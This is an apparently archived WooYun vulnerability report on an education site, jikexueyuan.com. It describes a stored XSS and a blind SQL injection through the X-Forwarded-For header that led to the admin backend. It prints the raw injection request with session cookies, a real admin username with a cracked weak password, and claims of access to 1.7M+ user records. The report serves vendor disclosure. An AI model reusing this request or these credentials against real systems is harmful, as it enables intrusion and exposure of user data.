当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151989

漏洞标题:极客学院某站存储XSS到主站后台(影响主站170+W用户数据)

相关厂商:jikexueyuan.com

漏洞作者: c26

提交时间:2015-11-05 11:41

修复时间:2015-12-20 12:42

公开时间:2015-12-20 12:42

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-05: 细节已通知厂商并且等待厂商处理中
2015-11-05: 厂商已经确认,细节仅向厂商公开
2015-11-15: 细节向核心白帽子及相关领域专家公开
2015-11-25: 细节向普通白帽子公开
2015-12-05: 细节向实习白帽子公开
2015-12-20: 细节向公众公开

简要描述:

某站存储XSS数据库影响主站数据

详细说明:

xss
http://jiuye.jikexueyuan.com/assistant/apply

WRABNL{A}_{DXV15ZYYJTC3.jpg

~H@2D$Z0TV9O6_GU$T0I(@G.png

}HUE[S1%8O5]AFRWU%6JS~B.jpg

@CD{1ZY]URRWA_M5OK(S}PL.jpg


后台找到一处盲注


GET /admin.php/system/updateadmin.html?id=136252 HTTP/1.1
Host: jiuye.jikexueyuan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Hm_lvt_f3c68d41bda15331608595c98e9c3915=1446626399; _ga=GA1.2.708734741.1441338219; stat_uuid=1441338222756488985253; PHPSESSID=iv8cm88mvc6tchthcdnivjs7v5; QINGCLOUDELB=2377a0539de61b7d01052585200c71bcd562b81daa2a899c46d3a1e304c7eb2b|Vjq/D|Vjq+h; Hm_lvt_c808ddaeb87f11e7e72f550be53a59cf=1446690442; Hm_lpvt_c808ddaeb87f11e7e72f550be53a59cf=1446690442; _gat=1; MECHAT_LVTime=1446690444714
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Cache-Control: max-age=0


54BWV_UZ56U`MLX_1]WT8HO.jpg


看到jkxy_v4感觉和主站有点关系,随手敲个admin.jikexueyuan.com就找到了(╯‵□′)╯︵┻━┻
使用的是ThinkPHP框架,并且开了Debug模式

http://admin.jikexueyuan.com/Public/login


T5G3VBF8L0ILH}D2NX0`NUX.jpg


可以看到是管理表是think_admin表
我就直接跑jkxy_v4的表了然后发现了think_admin了,吃惊

5)9SJ7401MI%1KD[9W1Z%U2.jpg


然后--sql-shell吧数据查出来了 发现是MD5加密,不过有的不对 估计这是之前的管理表,但是还是有办法的 发现123456的MD5 有几个弱口令的还是可以登录的进去

7Q)3$2E$G_MGG17MZ5P9(OD.jpg


[*] 86, liudongyi, e10adc3949ba59abbe56e057f20f883e
liudongyi:123456
后台可以加会员可以禁言重置密码功能很多


B(Q8_K])(IG__))`D756GYD.jpg


找了个用户查了一下 用户表

CYH]}QH0~J6)5X7NB350K9R.jpg


看一下用户数量 170+W

9ZJF9JPSH66()`2$4EHJV1S.jpg

漏洞证明:

~H@2D$Z0TV9O6_GU$T0I(@G.png

}HUE[S1%8O5]AFRWU%6JS~B.jpg

5)9SJ7401MI%1KD[9W1Z%U2.jpg

7Q)3$2E$G_MGG17MZ5P9(OD.jpg

B(Q8_K])(IG__))`D756GYD.jpg

CYH]}QH0~J6)5X7NB350K9R.jpg

9ZJF9JPSH66()`2$4EHJV1S.jpg


修复方案:

过滤输入
数据库用户权限的分配
拒绝弱口令
求个礼物

版权声明:转载请注明来源 c26@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-05 12:41

厂商回复:

非常感谢~

最新状态:

暂无

漏洞评价:

评论

  1. 2015-11-05 11:46 | king7 ( 普通白帽子 | Rank:709 漏洞数:141 | 收WB~~1:7手续费协商,个位数到三位数量都...)

    我可是好几年的会员啊。表哥留情

  2. 2015-11-05 11:57 | 尊-折戟 ( 实习白帽子 | Rank:72 漏洞数:18 | 与时俱进!=忘本)

    大神,不是最近有领免费VIP吗?

  3. 2015-11-05 12:10 | her0ma ( 普通白帽子 | Rank:641 漏洞数:92 | 专注小厂商三十年!)

    后台是有导出数据的功能吗?还是有批量修改用户各种数据的功能?不然咋能影响170W+的用户数据???

  4. 2015-11-05 12:37 | 咖啡 ( 实习白帽子 | Rank:48 漏洞数:20 )

    @her0ma 。。。。。。。

  5. 2015-11-05 12:42 | Submit ( 普通白帽子 | Rank:504 漏洞数:111 | 下一个会是我吗?)

    极客学院的粉丝

  6. 2015-11-05 14:38 | Security ( 实习白帽子 | Rank:32 漏洞数:12 )

    @her0ma 标题非常重要!!!!!!